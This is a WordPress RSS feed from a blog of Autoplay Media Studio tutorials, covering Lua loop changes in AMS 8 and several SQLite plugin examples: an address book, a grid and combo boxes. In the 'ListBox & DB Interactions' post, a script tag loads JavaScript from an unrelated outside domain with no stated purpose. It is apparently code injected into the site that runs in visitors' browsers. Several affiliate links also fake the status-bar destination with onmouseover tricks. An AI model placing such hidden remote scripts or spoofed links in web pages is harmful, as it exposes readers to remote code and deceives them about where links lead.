<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Autoplay Media Studio Examples &#38; Scripts &#187; SQLite Plugin</title>
	<atom:link href="http://amstudio.azman.info/category/sqlite-plugin/feed/" rel="self" type="application/rss+xml" />
	<link>http://amstudio.azman.info</link>
	<description>Samples for Autoplay Media Studio Users</description>
	<lastBuildDate>Fri, 17 Jun 2011 15:52:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.5</generator>
		<item>
		<title>What&#8217;s New in AMS 8</title>
		<link>http://amstudio.azman.info/2011/06/17/whats-new-in-ams-8/</link>
		<comments>http://amstudio.azman.info/2011/06/17/whats-new-in-ams-8/#comments</comments>
		<pubDate>Fri, 17 Jun 2011 15:47:44 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Application Action]]></category>
		<category><![CDATA[Button]]></category>
		<category><![CDATA[Check Box]]></category>
		<category><![CDATA[Combo Box]]></category>
		<category><![CDATA[Dialog]]></category>
		<category><![CDATA[DialogEx]]></category>
		<category><![CDATA[File Action]]></category>
		<category><![CDATA[Grid]]></category>
		<category><![CDATA[Image]]></category>
		<category><![CDATA[Inherit]]></category>
		<category><![CDATA[Input]]></category>
		<category><![CDATA[LUA]]></category>
		<category><![CDATA[Label Action]]></category>
		<category><![CDATA[ListBox]]></category>
		<category><![CDATA[Navigation]]></category>
		<category><![CDATA[Paragraph Action]]></category>
		<category><![CDATA[Radio Button]]></category>
		<category><![CDATA[SQLite Plugin]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[SlideShow]]></category>
		<category><![CDATA[Status Dialog]]></category>
		<category><![CDATA[String Action]]></category>
		<category><![CDATA[Tables]]></category>
		<category><![CDATA[TextFile Action]]></category>
		<category><![CDATA[XML]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=894</guid>
		<description><![CDATA[Hi, If you want to use all the examples from AMS 5 to AMS 7.5 in your AMS 8 projects, please take note below. AMS 8 is using an updated version of LUA 5.1. One of the most important change is the TABLE ITERATION. This is the old code used in AMS 5 to AMS [...]]]></description>
			<content:encoded><![CDATA[<p>Hi,</p>
<p>If you want to use all the examples from AMS 5 to AMS 7.5 in your AMS 8 projects, please take note below.</p>
<p>AMS 8 is using an updated version of LUA 5.1. One of the most important change is the TABLE ITERATION.</p>
<p>This is the old code used in AMS 5 to AMS 7.5 for TABLE ITERATION ( loops )<br />
<code><br />
-----------------------------------------------<br />
mytable = {"One","Two","Three"};</p>
<p>for k, v in mytable do<br />
   Dialog.Message("Table Item", k .. "=" .. v);<br />
end<br />
-----------------------------------------------<br />
</code></p>
<p>If my examples are using LOOPS, you need to change like below:</p>
<p><code><br />
----------------------------------------------<br />
mytable = {"One","Two","Three"};</p>
<p>for k, v in <strong><span style="color: #ff0000;">pairs</span></strong>(mytable) do<br />
    Dialog.Message("Table Item", k .. "=" .. v);<br />
end<br />
----------------------------------------------<br />
</code></p>
<p>See the word &#8220;<span style="color: #ff0000;">pairs</span>&#8221; in red and the bracket, above?</p>
<p>Just add a BRACKET around your TABLE NAME and add the word &#8220;<span style="color: #ff0000;">pairs</span>&#8220;.</p>
<p>Then all my examples using loops will work.</p>
<p>lol &#8230;.. 99.9 % of my examples are using LOOPS.<br />
You&#8217;ll definitely have to change the codes.</p>
<p>Hope this helps.</p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=What%26%238217%3Bs%20New%20in%20AMS%208&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2011%2F06%2F17%2Fwhats-new-in-ams-8%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2011/06/17/whats-new-in-ams-8/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>ListBox &amp; DB Interactions</title>
		<link>http://amstudio.azman.info/2009/05/23/listbox-db-interactions/</link>
		<comments>http://amstudio.azman.info/2009/05/23/listbox-db-interactions/#comments</comments>
		<pubDate>Fri, 22 May 2009 17:29:31 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Button]]></category>
		<category><![CDATA[Combo Box]]></category>
		<category><![CDATA[Dialog]]></category>
		<category><![CDATA[DialogEx]]></category>
		<category><![CDATA[File Action]]></category>
		<category><![CDATA[Input]]></category>
		<category><![CDATA[LUA]]></category>
		<category><![CDATA[Label Action]]></category>
		<category><![CDATA[ListBox]]></category>
		<category><![CDATA[Radio Button]]></category>
		<category><![CDATA[SQLite Plugin]]></category>
		<category><![CDATA[Shell]]></category>
		<category><![CDATA[String Action]]></category>
		<category><![CDATA[Tables]]></category>
		<category><![CDATA[SQLite Database]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=719</guid>
		<description><![CDATA[Hi, Been some time. Was busy setting-up a new office in Kuala Lumpur. In between activities, I spared some time in transforming our previous project. Move over Text Files, here comes SQLite database. The SQLite DB file is located in MyDocs (XP/P8/ME) or Documents (Vista) hosted in the folder named as MyResourceFolder. The folder and [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.dpbolvw.net/pm118y1A719PTURUQYQPRQUYTZQW" target="_blank" onmouseover="window.status='http://eset.com';return true;" onmouseout="window.status=' ';return true;"><br />
<img src="http://www.awltovhc.com/jr75tkocig156362A21326A5B28" alt="ESET Smart Security - Save 25%" border="0"/></a><br />
Hi,</p>
<p>Been some time. Was busy setting-up a new office in Kuala Lumpur. In between activities, I spared some time in transforming our previous project. Move over Text Files, here comes SQLite database. </p>
<p>The SQLite DB file is located in MyDocs (XP/P8/ME) or Documents (Vista) hosted in the folder named as MyResourceFolder. The folder and DB file will be created automatically when launching this App. </p>
<div id="attachment_738" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress-300x274.jpg" alt="Mini Address Book with SQLite DB" title="miniaddress" width="300" height="274" class="size-medium wp-image-738" /></a><p class="wp-caption-text">Mini Address Book with SQLite DB</p></div>
<p>Some minor changes were made to the interface. I&#8217;ve also added more details but the functions remain the same:<br />
1. Add New Entry<br />
2. Delete Entries<br />
3. Edit Entries<br />
4. Search Entries<br />
5. Group Entries<br />
6. Rename Groups<br />
7. Delete Groups<br />
8. Share Items between Groups<br />
9. Make a New Group from Search Results<br />
10. Validate All Entries</p>
<div id="attachment_723" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress1.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress1-300x233.jpg" alt="Mini Address Book with SQLite" title="miniaddress1" width="300" height="233" class="size-medium wp-image-723" /></a><p class="wp-caption-text">Mini Address Book with SQLite</p></div>
<p>Since this Project uses SQLite, we have removed previous concerns. We can now<br />
1. Update Entries shared by several Groups all at once<br />
2. Search every row in the DB directly without any help from ListBox.</p>
<div id="attachment_724" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress2.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress2-300x264.jpg" alt="Mini Address Book with SQLite" title="miniaddress2" width="300" height="264" class="size-medium wp-image-724" /></a><p class="wp-caption-text">Mini Address Book with SQLite</p></div>
<p>For each item ( every DB row ), you might only see 4 data on the interface. In actual fact, this project is prepared for more than 10 data per item. This includes the usual suspects like Address, Zip Code, Street Name, Country, Birthday, Description, Notation and etc. I encourage readers to try embed more entries at the interface. This is the way to learn. </p>
<div id="attachment_725" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress3.jpg"><img src="http://amstudio.azman.info/wp-content/uploads/2009/05/miniaddress3-300x260.jpg" alt="Mini Address Book with SQLite" title="miniaddress3" width="300" height="260" class="size-medium wp-image-725" /></a><p class="wp-caption-text">Mini Address Book with SQLite</p></div>
<p>If you add Dermot&#8217;s Pop3 Plugin, you&#8217;re making an almost full-featured Email App. To learn more about SQlite DB on AMS, please view TJ Tigger&#8217;s Video.</p>
<p>Please <a href="http://amstudio.azman.info/wp-login.php?redirect_to=/category/sqlite-plugin/feed/">Login</a> or <a href="http://amstudio.azman.info/wp-login.php?action=register">Register</a> to download this file.</p>
<p><SCRIPT type="text/javascript" LANGUAGE="javascript" src="http://www.qksz.net/1e-h4m3"> </SCRIPT></p>
<p>In the next topic on Mini Address Book, I plan to add 2 more features:<br />
1. Photo for each Name<br />
2. Calendaring.</p>
<p>We&#8217;ll see how it goes. If there is a request, I will make create another example just for the Search Function. Please use the comment in the Blog.</p>
<p>And please, leave your comments in this blog.</p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=ListBox%20%26%23038%3B%20DB%20Interactions&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2009%2F05%2F23%2Flistbox-db-interactions%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2009/05/23/listbox-db-interactions/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>SQLite DB to Grid</title>
		<link>http://amstudio.azman.info/2009/03/22/sqlite-db-to-grid/</link>
		<comments>http://amstudio.azman.info/2009/03/22/sqlite-db-to-grid/#comments</comments>
		<pubDate>Sat, 21 Mar 2009 16:34:01 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Grid]]></category>
		<category><![CDATA[SQLite Plugin]]></category>
		<category><![CDATA[SQLite DB to Grid]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=239</guid>
		<description><![CDATA[Hi, SQLite DB is a good option if you plan to have a long list of data in your apps. Its quicker, its more efficient and works faster than text files or XML. When you combine SQLite with Grid, you&#8217;ve got yourself an app with tremendous potentials. The example I&#8217;ve added today, shows how to [...]]]></description>
			<content:encoded><![CDATA[<table border="0">
<tbody>
<tr>
<td><a href="http://www.tkqlhce.com/click-3414080-10541904" target="_top"><img src="http://www.tqlkg.com/image-3414080-10541904" border="0" alt="image: DrawPlus X2 from Serif" width="234" height="60" /></a></td>
<td><a href="http://www.dpbolvw.net/click-3414080-10541907" target="_top"><img src="http://www.ftjcfx.com/image-3414080-10541907" border="0" alt="image: PhotoPlus X2 from Serif" width="234" height="60" /></a></td>
</tr>
</tbody>
</table>
<p>Hi,</p>
<p>SQLite DB is a good option if you plan to have a long list of data in your apps. Its quicker, its more efficient and works faster than text files or XML.</p>
<p>When you combine SQLite with Grid, you&#8217;ve got yourself an app with tremendous potentials.</p>
<p>The example I&#8217;ve added today, shows how to combine these 2 powerful AMS elements, albeit in a very simple way. You can develop further from here. Remember to put ERROR CHECKING, if you plan to distribute apps.</p>
<div id="attachment_240" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/03/db2grid.jpg"><img class="size-medium wp-image-240" title="db2grid" src="http://amstudio.azman.info/wp-content/uploads/2009/03/db2grid-300x216.jpg" alt="Pull Data from SQLite DB to Grid" width="300" height="216" /></a><p class="wp-caption-text">Pull Data from SQLite DB to Grid</p></div>
<p>Please <a href="http://amstudio.azman.info/wp-login.php?redirect_to=/category/sqlite-plugin/feed/">Login</a> or <a href="http://amstudio.azman.info/wp-login.php?action=register">Register</a> to download this file.</p>
<p>Please leave a comment, if you like this sample.</p>
<p><a href="http://www.kqzyfj.com/5k117gv30v2IMNKNJRJIKJMJKSMN" target="_blank" onmouseover="window.status='http://www.ebooks.com';return true;" onmouseout="window.status=' ';return true;"><br />
<img src="http://www.tqlkg.com/j377ltxlrpAEFCFBJBACBEBCKEF" alt="10% off New York Times Best Sellers at eBooks.com" border="0"/></a></p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=SQLite%20DB%20to%20Grid&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2009%2F03%2F22%2Fsqlite-db-to-grid%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2009/03/22/sqlite-db-to-grid/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Lets Combine Various Examples</title>
		<link>http://amstudio.azman.info/2009/03/07/lets-combine-various-examples/</link>
		<comments>http://amstudio.azman.info/2009/03/07/lets-combine-various-examples/#comments</comments>
		<pubDate>Fri, 06 Mar 2009 18:06:04 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Button]]></category>
		<category><![CDATA[Combo Box]]></category>
		<category><![CDATA[Dialog]]></category>
		<category><![CDATA[Paragraph Action]]></category>
		<category><![CDATA[SQLite Plugin]]></category>
		<category><![CDATA[Dialog to DB to Combo]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=170</guid>
		<description><![CDATA[Hi, We have seen various examples on how to use Combo Boxes. So lets put together some of the examples into 1 APZ and make it into something more practical to use. In this example, we will ADD/DELETE/EDIT a SQLite DB Table through the use of the Good Old Dialog and reflect all changes in [...]]]></description>
			<content:encoded><![CDATA[<table border="0">
<tbody>
<tr>
<td><a href="http://www.tkqlhce.com/click-3414080-10541904" target="_top"><img src="http://www.tqlkg.com/image-3414080-10541904" border="0" alt="image: DrawPlus X2 from Serif" width="234" height="60" /></a></td>
<td><a href="http://www.dpbolvw.net/click-3414080-10541907" target="_top"><img src="http://www.ftjcfx.com/image-3414080-10541907" border="0" alt="image: PhotoPlus X2 from Serif" width="234" height="60" /></a></td>
</tr>
</tbody>
</table>
<p>Hi,</p>
<p>We have seen various examples on how to use Combo Boxes. So lets put together some of the examples into 1 APZ and make it into something more practical to use.</p>
<p>In this example, we will <strong>ADD/DELETE/EDIT</strong> a <strong>SQLite DB Table</strong> through the use of the <strong>Good Old Dialog</strong> and reflect all changes in a <strong>COMBO Box</strong> instantly.</p>
<p>This example affects only 2 Columns of each Row and shows the use of various SQL Queries. If you need to affect more Table Columns in a DB Row at one go, then replace the Dialog with DialogEx. Please refer to an earlier example on how to use DialogEx for Data Entry. Of course, you need to create more Column Names for the SQL Table. I leave it to your ingenuity.</p>
<div id="attachment_172" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/03/dialog2db2combo.jpg"><img class="size-medium wp-image-172" title="dialog2db2combo" src="http://amstudio.azman.info/wp-content/uploads/2009/03/dialog2db2combo-300x179.jpg" alt="Dialog To DB to Combo" width="300" height="179" /></a><p class="wp-caption-text">Dialog To DB to Combo</p></div>
<p>Please <a href="http://amstudio.azman.info/wp-login.php?redirect_to=/category/sqlite-plugin/feed/">Login</a> or <a href="http://amstudio.azman.info/wp-login.php?action=register">Register</a> to download this file.</p>
<p>If you download this example, please leave a comment.</p>
<p><a href="http://www.tkqlhce.com/mn97y1A719PTURUQYQPRQWTTWSV" target="_blank" onmouseover="window.status='http://learning.graphics.com/';return true;" onmouseout="window.status=' ';return true;"><br />
<img src="http://www.awltovhc.com/hc103bosgmk59A7A6E6576C99C8B" alt="Graphics.com/Learning" border="0"/></a></p></p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=Lets%20Combine%20Various%20Examples&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2009%2F03%2F07%2Flets-combine-various-examples%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2009/03/07/lets-combine-various-examples/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Fill Combo from SQLite DB</title>
		<link>http://amstudio.azman.info/2009/03/02/fill-combo-from-sqlite-db/</link>
		<comments>http://amstudio.azman.info/2009/03/02/fill-combo-from-sqlite-db/#comments</comments>
		<pubDate>Mon, 02 Mar 2009 06:06:03 +0000</pubDate>
		<dc:creator>Azmanar</dc:creator>
				<category><![CDATA[Combo Box]]></category>
		<category><![CDATA[Paragraph Action]]></category>
		<category><![CDATA[SQLite Plugin]]></category>
		<category><![CDATA[AMS Samples]]></category>
		<category><![CDATA[Autoplay Media Studio Samples]]></category>
		<category><![CDATA[Paragraph]]></category>
		<category><![CDATA[SQLite]]></category>

		<guid isPermaLink="false">http://amstudio.azman.info/?p=93</guid>
		<description><![CDATA[All of the previous examples use TABLES to populate items into Combo Boxes. This is an economical and quick method when dealing with items such as Dates, Names of Days, Names of Months, AM/PM, Gender, Number of Children, Race, Marital Status and other small list. For larger lists, we prefer to use SQLite DB. This [...]]]></description>
			<content:encoded><![CDATA[<table border="0">
<tbody>
<tr>
<td><a href="http://www.tkqlhce.com/click-3414080-10541904" target="_top"><img src="http://www.tqlkg.com/image-3414080-10541904" border="0" alt="image: DrawPlus X2 from Serif" width="234" height="60" /></a></td>
<td><a href="http://www.dpbolvw.net/click-3414080-10541907" target="_top"><img src="http://www.ftjcfx.com/image-3414080-10541907" border="0" alt="image: PhotoPlus X2 from Serif" width="234" height="60" /></a></td>
</tr>
</tbody>
</table>
<p>All of the previous examples use TABLES to populate items into Combo Boxes. This is an economical and quick method when dealing with items such as Dates, Names of Days, Names of Months, AM/PM, Gender, Number of Children, Race, Marital Status and other small list.</p>
<p>For larger lists, we prefer to use SQLite DB.</p>
<p>This example shows how to populate Combo from DB on program start-up and how to populate a second Combo from DB upon selection. When an item  in the second Combo is selected, data is pulled from DB and set into the Paragraph.</p>
<p>Please note that, when SQL files are located in AMS Docs Folder, it cannot be modified after compiling. To enable modifications, SQL File must be located on the writable space of user&#8217;s PC.</p>
<div id="attachment_95" class="wp-caption aligncenter" style="width: 310px"><a href="http://amstudio.azman.info/wp-content/uploads/2009/03/12.jpg"><img class="size-medium wp-image-95" title="12" src="http://amstudio.azman.info/wp-content/uploads/2009/03/12-300x216.jpg" alt="Fill Combo from SQLite DB" width="300" height="216" /></a><p class="wp-caption-text">Fill Combo from SQLite DB</p></div>
<p>Please <a href="http://amstudio.azman.info/wp-login.php?redirect_to=/category/sqlite-plugin/feed/">Login</a> or <a href="http://amstudio.azman.info/wp-login.php?action=register">Register</a> to download this file.</p>
<p>Please leave a comment when you download files from here.</p>
<p><a href="http://www.tkqlhce.com/mn97y1A719PTURUQYQPRQWTTWSV" target="_blank" onmouseover="window.status='http://learning.graphics.com/';return true;" onmouseout="window.status=' ';return true;"><br />
<img src="http://www.awltovhc.com/hc103bosgmk59A7A6E6576C99C8B" alt="Graphics.com/Learning" border="0"/></a></p>
<div class="addtoany_share_save_container"><ul class="addtoany_list"><li><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?sitename=Autoplay%20Media%20Studio%20Examples%20%26amp%3B%20Scripts&amp;siteurl=http%3A%2F%2Famstudio.azman.info%2F&amp;linkname=Fill%20Combo%20from%20SQLite%20DB&amp;linkurl=http%3A%2F%2Famstudio.azman.info%2F2009%2F03%2F02%2Ffill-combo-from-sqlite-db%2F"><img src="http://amstudio.azman.info/wp-content/plugins/add-to-any-ori/share_save_120_16.png" width="120" height="16" alt="Share/Save/Bookmark"/></a></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://amstudio.azman.info/2009/03/02/fill-combo-from-sqlite-db/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

